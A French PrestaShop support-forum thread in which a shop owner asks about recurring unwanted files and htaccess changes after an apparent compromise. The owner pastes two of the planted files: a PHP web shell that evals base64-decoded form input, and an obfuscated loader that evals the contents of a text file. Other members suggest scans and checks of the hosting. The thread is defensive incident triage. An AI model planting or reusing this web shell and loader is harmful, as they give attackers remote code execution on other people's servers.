Récemment
-
[REGLÉ] override - je n'y arrive pas.
Modules3 -
les routes sur mesures
Discussion générale6 -
Nouvelle attaque ?
Discussion générale11 -
Problème calcul HT
Bugs & Améliorations42 -
Erreur sur facture générée depuis le FO
PhenixSuite3 -
Factures ne se génèrent plus depuis 06/12 [RÉSOLU]
Bugs & Améliorations20 -
Problèmes de prix avec plusieurs devises et PayPal
PhenixSuite3 -
Edition en masse des déclinaisons
Nouvelles fonctionnalités4 -
Mise à niveau de Prestashop 1.6.24 vers PhenixSuite 1.6.30
Discussion générale2 -
PaypalAPI erreur
PhenixSuite50 -
Thème possible
Questions relatives à l'installation/upgrade2 -
erreurs cleaner
Discussion générale3 -
multiples déclinaisons sur produit [RÉSOLU]
Bugs & Améliorations22 -
Thème enfant
PhenixSuite3 -
ONePageCheckout
BUG connus4 -
Informations générales
PhenixSuite2 -
timepicker absent dans le BO
Bugs & Améliorations11 -
Installation Phenixsuite depuis 1.6.1.24
Questions relatives à l'installation/upgrade4 -
Passage au Webp qui n'a pas fonctionné
Bugs & Améliorations11 -
erreur 500 module paypal
Bugs & Améliorations8
Nouvelle attaque ?
-
Bonjour à tous,
Je constate sur mon presta certaines modifications anormales, en tout cas non souhaitées qui me laisse penser à une attaque.
Voici en quelques mots ce que j'ai pu observer :
Modification du htaccess
Creation de fichiers 1.mcm.x86_64, confcom.php, conf.php, lowpr.php,...
Malgré la suppression des fichiers indésirables et le rétablissement du htaccess, cela revient régulièrement.
J'ai passé le scan de sécurité cleaner.php de @eolia qui ne détecte pas de virus.
Quelqu'un a-t-il été confronté à cela auparavant ? Et si oui, quelles sont les actions à mener ?Merci pour vos réponses.
-
Quelle version de Presta ?
-
Désolé pour l'oubli : il s'agit de 1.7.2.4
-
Avant que vous ne supprimiez quoi que ce soit, Cleaner ne trouve rien ?
-
Non !
Il y a bien des alertes de modification mais après vérification, c'est normal.
Aucune modification en rouge.
-
il y a quoi dans les fichiers que vous avez supprimé ?
-
Le fichier 1.mcm.x86_64 est trop long pour être transmis tel quel.
Le fichier confcom.php est vide
Le fichier conf.php est le suivant :
<!DOCTYPE html>
<html>
<head>
<title>PHP command</title>
</head>
<body>
<form method="post" action="">
<input type="text" name="php" id="php">
<input type="submit" value="Execute">
</form>
<?php
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
$php = $_POST['php'];
$php = strtr($php, '-', '=');
$php = base64_decode($php);
if($php) {
$result = eval($php);
echo $result;
}
}
?>
</body>
</html>Le fichier lowpr.php est le suivant :
<?php
$table_prefix = "wbzaxsye6w4_duevcwondme";
$table_prefix = str_replace(array("z", "x", "y", "u", "v", "w", "n", "m"), "", $table_prefix);
$txt_contents = "1f2i3l4e5_6g7e8t9_0c1o2n3t4e5n6t7s8";
$txt_contents = preg_replace("/\d+/", "", $txt_contents);
$wp_content = $txt_contents("lowpr".".txt");
eval/Designed with utility, safety and style/($table_prefix($wp_content));
?>J'espère que cela vous donnera des idées car je suis pas compétent !
Merci par avance
-
Bah je ne comprends pas que Cleaner ne les trouve pas avec de telles fonctions à l'intérieur. (eval() par exemple)
-
J'ai oublié : j'ai passé cleaner.php après avoir supprimé les fichiers ...
Cela ne change rien dans les faits car ils reviennent ce qui signifie que l'infection vient d'un autre fichier ou d'une faille qui, lui /elle n'a pas été détecté ...
-
Par contre il faut comprendre les limites du système.
La version 1.7 c'est plus d'un million de lignes de code (contre 300 000 pour les 1.6) et cleaner ne peut pas scanner tous les fichiers/répertoires surtout que j'ai arrêté de suivre leurs évolutions.
Un autre élément à contrôler: pas d'autres CMS sur le même hébergement (WordPress ou autre) ni de répertoires inconnus (créés par vous et non-scannés) ?
-
@RPro a dit dans Nouvelle attaque ? :
eval/Designed with utility, safety and style/($table_prefix($wp_content));
Cela ressemble pas mal à une attaque pour wordpress.